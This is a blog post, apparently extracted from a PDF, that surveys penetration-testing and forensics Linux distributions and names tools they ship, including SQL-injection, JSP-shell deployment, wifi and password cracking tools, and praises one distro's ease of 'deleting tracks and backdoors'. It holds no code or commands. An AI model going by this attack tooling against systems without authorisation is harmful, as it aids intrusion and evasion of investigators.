best tool penentesting

8/22/2019 Best Tool Penentesting

1/12

1. BackTrack 5r3

The mamma or best known of Linux pentesting distros. BackTrack has a very

cool strapline: The quieter you become, the more you are able to hear. That just

sounds cool.

BackTrack is based on the ever-popular Ubuntu. The pentesting distro used to be

only available within a KDE environment but Gnome become was added as an

option with the release of BackTrack v5. For those working in Information

Security or intrusion detection, BackTrack is one of the most popular pentestingdistros that can run on a live CD or flash drive. The distribution is ideal for

wireless cracking, exploiting, web application assessment, learning, or social-

engineering a client.

Here is a list of some of the awesome tools available in BackTrack 5r3 (the

latest release).

To identify Live Hosts:

dnmap Distributed NMap

address6 (which acts as a IPV6 address conversion)

Information Gathering Analysis (Social Engineering)

Jigsaw Grabs information about company employees

Uberharvest Email harvester

sslcaudit SSL Cert audit

VoIP honey VoIP Honeypot

urlcrazy Detects URL typos used in typo squatting, url hijacking, phishing

Web Crawlers

Apache_users Apache username enumerator

Deblaze Performs enumeration and interrogation against Flash remote end

points
http://www.concise-courses.com/security/wp-content/uploads/2012/11/backtrack.png


2/12

Database Analysis

Tnscmd10g Allows you to inject commands into Oracle

BBQSQL Blind SQL injection toolkit

* If you are interested in Database Security see our Hacker Halted summary

here.

Bluetooth Analysis

Blueranger Uses link quality to locate Bluetooth devices

Vulnerability Assessment

Lynis Scans systems & software for security issues

DotDotPwn Directory Traversal fuzzer

Exploitation Tools

Netgear-telnetable Enables Telnet console on Netgear devices

Terminator Smart Meter tester

Htexploit Tool to bypass standard directory protectionJboss-Autopwn Deploys JSP shell on target JBoss servers

Websploit Scans & analyses remote systems for vulnerabilities

Wireless Exploitation Tools

Bluepot Bluetooth honeypot

Spooftooph Spoofs or clones Bluetooth devices

Smartphone-Pentest-Framework

Fern-Wifi-cracker Gui for testing Wireless encryption strength

Wi-fihoney Creates fake APs using all encryption and monitors with Airodump

Wifite Automated wireless auditorPassword Tools

Creddump

Johnny

Manglefizz

Ophcrack

Phrasendresher

Rainbowcrack

Acccheck

smbexec


3/12

2. NodeZero.

Like BackTrack,

NodeZero is an Ubuntu based distro used for penetration testing using

repositories so every time Ubuntu releases a patch for its bugs, you also are

notified for system updates or upgrades. Node Zero used to be famous for its

inclusion of THC IPV6 Attack Toolkit which includes tools like alive6, detect-new-

ip6, dnsdict6, etc, but I think that these days BackTrack 5r3 also includes these

tools.

Whereas BackTrack is touted as being a run-everywhere distro, i.e. running itlive, NodeZero Linux (which can also be run live) state that the distros real

strength comes from a hard install. NodeZero, in their own words, believe that a

penetration tester requires a strong and efficient system [achieved by using] a

distribution that is a permanent installation, that benefits from a strong selection

of tools, integrated with a stable Linux environment. Sounds cool. Ever tried it?

Let us know in the comments below.
http://www.concise-courses.com/security/wp-content/uploads/2012/11/node-zero.png


4/12

3. BackBox Linux

BackBox is getting

more popular by the day. Like BackTrack and NodeZero, BackBox Linux is an

Ubuntu-based distribution developed to perform penetration tests and security

assessments. The developers state that the intention with BackBox is to create a

pentesting distro that is fast and easy to use. BackBox does have a pretty

concise looking desktop environment and seems to work very well. Like the other

distros BackBox is always updated to the latest stable versions of the most often

used and best-known ethical hacking tools through repositories.

BackBox has all the usual suspect for Forensic Analysis, Documentation &

Reporting and Reverse Engineering with tools like ettercap, john, metasploit,

nmap, Social Engineering Toolkit, sleuthkit, w3af, wireshark, etc.
http://www.concise-courses.com/security/wp-content/uploads/2012/11/backbox.png


5/12

4. Blackbuntu.

Yes, as the name

clearly suggests, this is yet another distro that is based on Ubuntu. Here is a list

of Security and Penetration Testing tools or rather categories available within

the Blackbuntu package, (each category has many sub categories) but this gives

you a general idea of what comes with this pentesting distro: Information

Gathering, Network Mapping, Vulnerability Identification, Penetration, Privilege

Escalation, Maintaining Access, Radio Network Analysis, VoIP Analysis, Digital

Forensic, Reverse Engineering and a Miscellaneous section. This list is hardly

revolutionary but the tools contained within might be different to the other distros.

5. Samurai Web Testing Framework.

This is a live Linux
http://www.concise-courses.com/security/wp-content/uploads/2012/11/samurai.pnghttp://www.concise-courses.com/security/wp-content/uploads/2012/11/blackbuntu.pnghttp://www.concise-courses.com/security/wp-content/uploads/2012/11/samurai.pnghttp://www.concise-courses.com/security/wp-content/uploads/2012/11/blackbuntu.png


6/12

distro that has been pre-configured with some of the best of open source and free

tools that focus on testing and attacking websites. (The difference with Samurai

Web Testing Framework is that it focuses on attacking (and therefore being able

to defend) websites. The developers outline four steps of a web pen-test. These

steps are incorporated within the distro and contain the necessary tools to

complete the task.

Step 1: Reconnaissance Tools include Fierce domain scanner and Maltego.

Step 2: Mapping Tools include WebScarab and ratproxy.

Step 3: Discovery Tools include w3af and burp.

Step 4: Exploitation Tools include BeEF, AJAXShell and much more.

Of interest as well, the Live CD also includes a pre-configured wiki, set up to be a

central information store during your pen-test.

The Samurai Web Testing Framework is a live Linux distro that focuses on web

application vulnerability research and web pentesting within a safe environment

i.e. so you can ethical hack without violating any laws. This is a pentesting

distro recommended for penetration testers who wants to combine network and

web app techniques.

6. Knoppix STD.

This distro is based

on Debian and originated in Germany. The architecture is i486 and runs from the

following desktops: GNOME, KDE, LXDE and also Openbox. Knoppix has been

around for a long time now in fact I think it was one of the original live distros.

Knoppix is primarily designed to be used as a Live CD, it can also be installed on

a hard disk. The STD in the Knoppix name stands for Security Tools Distribution.

The Cryptography section is particularly well-known in Knoppix.
http://www.concise-courses.com/security/wp-content/uploads/2012/11/knoppix.png


7/12

7. Pentoo.

Pentoo is a security-

focused live CD based on Gentoo. In their own words Pentoo is Gentoo with the

pentoo overlay. So, if you are into Pentoo then this is the distro for you. Their

homepage lists some of their customized tools and kernel, including: a Hardened

Kernel with aufs patches, Backported Wifi stack from latest stable kernel release,

Module loading support ala slax, XFCE4 wm and Cuda/OPENCL cracking

support with development tools.

8. WEAKERTH4N.

This penetration
http://www.concise-courses.com/security/wp-content/uploads/2012/11/weakerth4n.pnghttp://www.concise-courses.com/security/wp-content/uploads/2012/11/pentoo.pnghttp://www.concise-courses.com/security/wp-content/uploads/2012/11/weakerth4n.pnghttp://www.concise-courses.com/security/wp-content/uploads/2012/11/pentoo.png


8/12

distribution is built from Debian Squeeze and uses Fluxbox for its desktop

environment. This pentesting distro is particularly well adjusted for WiFi hacking

since it contains many Wireless tools. Here is a quick summary of

WEAKERTH4Ns tool categories: Wifi attacks, SQL Hacking, Cisco Exploitation,

Password Cracking, Web Hacking, Bluetooth, VoIP Hacking, Social Engineering,

Information Gathering, Fuzzing, Android Hacking, Networking and Shells.

9. Matriux Krypton.

This linux distro is, I

believe, is the first security distribution based directly on Debian, (after

WEAKERTH4N?) if I am wrong please comment below! There are 300 security

tools to work, called arsenals. The arsenals allow for penetration testing, ethical

hacking, system and network administration, security testing, vulnerability

analysis, cyber forensics investigations, exploiting, cracking and data recovery.

The last category, data recovery, doesnt seem to be prevalent in the other

distros.
http://www.concise-courses.com/security/wp-content/uploads/2012/11/matriux-krypton.png


9/12

10. DEFT.

The latest version is

DEFT 7 which is based on the new Linux Kernel 3 and the DART (Digital

Advanced Response Toolkit). This distro is more orientated towards Computer

Forensics and uses LXDE as desktop environment and WINE for executing

Windows tools under Linux. The developers, (based in Italy) hope that their distro

will be used by the Military, Police, Investigators, IT Auditors and professional

penetration testers. DEFT is an abbreviation for Digital Evidence & Forensic

Toolkit

11. CAINE

A reader to our blog

suggested to add CAINE which we duly have. CAINE Stands for Computer Aided
http://www.concise-courses.com/security/wp-content/uploads/2012/11/caine.pnghttp://www.concise-courses.com/security/wp-content/uploads/2012/11/DEFT.pnghttp://www.concise-courses.com/security/wp-content/uploads/2012/11/caine.pnghttp://www.concise-courses.com/security/wp-content/uploads/2012/11/DEFT.png


10/12

Investigative Environment, and like many information security products and tools

it is Italian GNU/Linux live distribution. CAINE offers a comprehensive forensic

environment that is organized to integrate existing software tools that are

composed as software modules, all displayed within a friendly graphical interface.

CAINE states to have three objectives. These are, to ensure that the distro works

in an interoperable environment that supports the digital investigator during the

four phases of the digital investigation. Secondly that the distro has a user

friendly graphical interface and finally that it provides a semi-automated

compilation of the final forensic report. As you would likely expect, CAINE is fully

open-source.

If anyone has used this please let us know.

12. Bugtraq

Bugtraq is another

reader submitted pentesting distro. Based on the 26.6.38 kernel, this distro offers

a really wide range of penetration and forensic tools. Like most of the others in

this list, Bugtraq can hard-install of obviously run as a Live DVD or from a USB

drive. Bugtraq claims to have recently configured and updated the kernel for

better performance but also importantly so that it can recognize more hardware,

including wireless injection patches pentesting. The team at Bugtraq seem solid

because they are clearly making an effort to get the kernel to work with more

hardware something which the other distributions dont always place enough

importance.

Some of the special features included with Bugtraq include (as stated) an

expanded range of recognition for injection wireless drivers, (i.e. not just the

usual Alfa rtl8187), a patched 2.6.38 kernel and solid installation of the usualsuspects: Nessus, OpenVAS, Greenbone, Nod32, Hashcat, Avira etc.
http://www.concise-courses.com/security/wp-content/uploads/2012/11/bug-traq.png


11/12

Unique to Bugtraq (as claimed on their site) is the ability to, or better said, ease,

of deleting tracks and backdoors. Just by having read about Bugtraq Im really

glad that I can add this to the list because it just sounds like a job well done. If

you are interested in any of the following pentesting and forensic categories, then

do go and check out Buqtraq: Malware, Penetration Shield, Web audit, Brute

force attack, Communication and Forensics Analytics, Sniffers, Virtualizations,

Anonymity and Tracking, Mapping and Vulnerability detection.

Quick Summary:You cant go wrong with any Ubuntu based distro. BackTrack

does the job well but I guess, of course, its all personal i.e. does the distro do

the job for you? Every penetration tester needs a lean towards a particular tool or

tool-set. Frankly they are all good, and it would be prudent to use several of these

pentesting distros as live versions. For WiFi hacking then WEAKERTH4N is likely

your better friend, whilst to stay within the law, use Samurai.

Bugtraq looks really good the team behind it seems to have taken considerable

time to tick all the boxes. Once we test it Ill update the post.

Here is a list of other distros (which we think are still alive and kicking please

correct us if we are wrong).

Other Distros

Damn Vulnerable Linux (reader comment: more of an operating system for

attacking purposes)

Hakin9 (an educational and training distro that you can use to play-along with

when subscribing to the Hacking Magazine Hak9)

HelixnUbuntu

Network Security Toolkit (NST)

OWASP Labrat

Frenzy

grml

Ophcrack

FCCU

OSWA Assistant

Russix

Chaox-NGGnackTrack

Katana

Securix-NSM

Auditor

And here is a list of distros that, regrettably, have passed on to Linux Heaven.

KCPentrix

Protech

FIRE

Arudius

INSERT

Local Area Security (LAS)


12/12

NavynOS

Operator

PHLAK

PLAC

SENTINIX

Talos

ThePacketMaster

Trinux

WarLinux

Whoppix

WHAX

HeX

Stagos FSE

SNARL

best tool penentesting

Documents